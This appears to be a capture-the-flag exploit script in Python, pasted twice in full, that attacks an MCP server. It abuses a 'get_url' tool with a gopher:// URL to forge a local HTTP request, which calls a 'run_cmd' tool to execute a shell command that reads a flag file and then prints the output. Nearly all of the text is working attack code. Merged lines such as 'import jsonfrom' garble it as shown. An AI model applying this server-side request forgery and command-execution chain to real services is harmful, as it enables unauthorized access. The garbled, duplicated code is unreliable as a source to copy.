import jsonfrom urllib.parse import quote_plus
import anyioimport httpxfrom httpx import URL
from mcp.client.session import ClientSession
from mcp.client.sse import sse_client
from mcp.types import JSONRPCResponse
class AsyncClient(httpx.AsyncClient):
session_id: str | None = None
def post(self, *args, **kwargs):
"""Override post method to ensure it uses the MCP client."""url = args[0] if args else kwargs.get("url")
self.session_id = URL(url).params.get("session_id")
return super().post(*args, **kwargs)
client = AsyncClient(timeout=httpx.Timeout(30.0))
def create_mcp_http_client(
headers: dict[str, str] | None = None,
timeout: httpx.Timeout | None = None,
auth: httpx.Auth | None = None,
) -> httpx.AsyncClient:
return clientdef build_gopher_request():
session_id = client.session_id
body = json.dumps(
{"method": "tools/call",
"params": {
"name": "run_cmd",
"arguments": {"command": ["sh", "-c", "cat /home/mcp/flag_7d1f2527449d356d094227b54415c6dc.txt"]},
},
"jsonrpc": "2.0",
"id": 114514,
} )payload = (
f"""POST /messages/?session_id={session_id} HTTP/1.1Host: xxxxx
Connection: close
Content-Type: application/json
Content-Length: {len(body)}""".replace("\n", "\r\n")
+ body+ "\r\n\r\n\r\n\r\n"
)finalpayload = (
quote_plus(payload)
.replace("+", "%20")
.replace("%2F", "/")
.replace("%25", "%")
.replace("%3A", ":")
)return f"gopher://127.0.0.1:8000/_{finalpayload}"
async def main():
async with sse_client(
"http://example.com:8161/sse", httpx_client_factory=create_mcp_http_client
) as (read, write):
async with ClientSession(read, write) as session:
async def read_114514_response():
streamer, reader = anyio.create_memory_object_stream(1)
session._response_streams[114514] = streamer
message: JSONRPCResponseasync for message in reader:
print(json.loads(message.result['content'][0]['text'])['stdout'])
returnasync def send_exploit():
await session.initialize()
payload = build_gopher_request()
print(f"Sending payload: {payload}")
res = await session.call_tool(
"get_url",
{"url": payload,
},
)print(f"Received response: {res.content}")
async with anyio.create_task_group() as tg:
tg.start_soon(read_114514_response)
tg.start_soon(send_exploit)
if __name__ == "__main__":
import asyncioasyncio.run(main())
import jsonfrom urllib.parse import quote_plus
import anyioimport httpxfrom httpx import URL
from mcp.client.session import ClientSession
from mcp.client.sse import sse_client
from mcp.types import JSONRPCResponse
class AsyncClient(httpx.AsyncClient):
session_id: str | None = None
def post(self, *args, **kwargs):
"""Override post method to ensure it uses the MCP client."""url = args[0] if args else kwargs.get("url")
self.session_id = URL(url).params.get("session_id")
return super().post(*args, **kwargs)
client = AsyncClient(timeout=httpx.Timeout(30.0))
def create_mcp_http_client(
headers: dict[str, str] | None = None,
timeout: httpx.Timeout | None = None,
auth: httpx.Auth | None = None,
) -> httpx.AsyncClient:
return clientdef build_gopher_request():
session_id = client.session_id
body = json.dumps(
{"method": "tools/call",
"params": {
"name": "run_cmd",
"arguments": {"command": ["sh", "-c", "cat /home/mcp/flag_7d1f2527449d356d094227b54415c6dc.txt"]},
},
"jsonrpc": "2.0",
"id": 114514,
} )payload = (
f"""POST /messages/?session_id={session_id} HTTP/1.1Host: xxxxx
Connection: close
Content-Type: application/json
Content-Length: {len(body)}""".replace("\n", "\r\n")
+ body+ "\r\n\r\n\r\n\r\n"
)finalpayload = (
quote_plus(payload)
.replace("+", "%20")
.replace("%2F", "/")
.replace("%25", "%")
.replace("%3A", ":")
)return f"gopher://127.0.0.1:8000/_{finalpayload}"
async def main():
async with sse_client(
"http://example.com:8161/sse", httpx_client_factory=create_mcp_http_client
) as (read, write):
async with ClientSession(read, write) as session:
async def read_114514_response():
streamer, reader = anyio.create_memory_object_stream(1)
session._response_streams[114514] = streamer
message: JSONRPCResponseasync for message in reader:
print(json.loads(message.result['content'][0]['text'])['stdout'])
returnasync def send_exploit():
await session.initialize()
payload = build_gopher_request()
print(f"Sending payload: {payload}")
res = await session.call_tool(
"get_url",
{"url": payload,
},
)print(f"Received response: {res.content}")
async with anyio.create_task_group() as tg:
tg.start_soon(read_114514_response)
tg.start_soon(send_exploit)
if __name__ == "__main__":
import asyncioasyncio.run(main())